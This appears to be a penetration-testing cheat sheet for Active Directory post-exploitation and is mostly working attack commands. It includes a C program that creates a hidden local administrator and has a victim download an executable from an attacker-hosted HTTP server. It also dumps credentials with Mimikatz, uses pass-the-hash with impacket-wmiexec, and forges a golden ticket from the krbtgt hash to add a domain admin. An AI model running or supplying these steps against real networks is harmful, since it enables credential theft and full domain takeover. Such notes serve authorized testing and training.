Active Directory Post Exploitation

Active Directory Post Exploitation

Access Users Remotely

Xfreerdp

xfreerdp /u:mike /p:P@ssword /d:homeserver.local /v:192.168.56.13 /w:1920 /h:1080 /fonts /smart-sizing

Gathering Info

Cmd

# Get current user's detail
whoami

# View Groups
whoami /groups

# View all users in the domain
net user

Privilege Escalation

Powershell

View Running Services

 Get-CimInstance -ClassName win32_service | Select Name,State,PathName,StartName | Where-Object {$_.State -like 'Running'}

View Start Mode of Services

Get-CimInstance -ClassName Win32_Service -Filter "Name='<service name>'" | Select-Object StartMode

Check Permissions using ICACLS

icacls "File Name/Path"

C Program

Adduser.c

#include<stdio.h>
#include<stdlib.h>

int main()
{

        int i;
        
        i = system("net user peter P@ssword /add");
        i = system("net localgroup administrators peter /add");

        return 0;

}

Compile

x86_64-w64-mingw32-gcc exploit.c -o adduser.exe

Share the Exe

# Attacker Machine
python3 -m http.server

# Victim Machine
iwr -Uri http://10.10.10.10/<file.exe> -OutFile <file.exe>

Stealing Credentials

Mimikatz

# Start mimikatz
.\mimikatz.exe

# Dump hahses
privilege::debug

sekurlsa::logonpasswords

Impacket

Wmiexec

impacket-wmiexec -hashes :<NT Hash> domain/user@<IP>

# Vew powershell history
cd C:\users\jack\appdata\roaming\microsoft\microsoft\windows\powershell\psreadline

PsExec

# Accessing the domain controller
.\PSExec64.exe \\dc01 cmd.exe

Forging Golden Tickets

Get krbtgt Hash and Domain SID

.\mimikatz.exe

privilege::debug

# Dump Hashes
lsadump::lsa /patch

Create Golden Ticket

.\mimiktaz.exe

kerberos::purge

# Creating Ticket

kerberos::golden /user:<any user> /domain:homeserver.local /sid:<domain sid> /krbtgt:<krbtgt hash> /ticket:homeserver_golden

Using Golden Ticket

Powershell

.\mimikatz.exe

kerberos::ptt homeserver_golden

misc::cmd

PsExec

PsExec.exe \\dc01 cmd.exe

# Add a user to domain
net user mike P@ssword /add /domain 

# Add a user to domain group
net group "domain admins" mike /add /domain

REFERENCES

  • https://www.mankier.com/1/xfreerdp

  • https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/icacls

  • https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service

  • https://www.netwrix.com/how_golden_ticket_attack_works.html

  • https://docs.metasploit.com/docs/pentesting/active-directory/kerberos/forge_ticket.html

  • https://www.youtube.com/watch?v=f8jGhLwCa28&pp=ygUgd2luZG93cyBwZW50ZXN0IGFjdGl2ZSBkaXJlY3Rvcnk%3D

  • https://www.hackingarticles.in/understanding-guide-mimikatz/

  • https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket

PreviousAD Post ExploitationNextIntroduction to Identities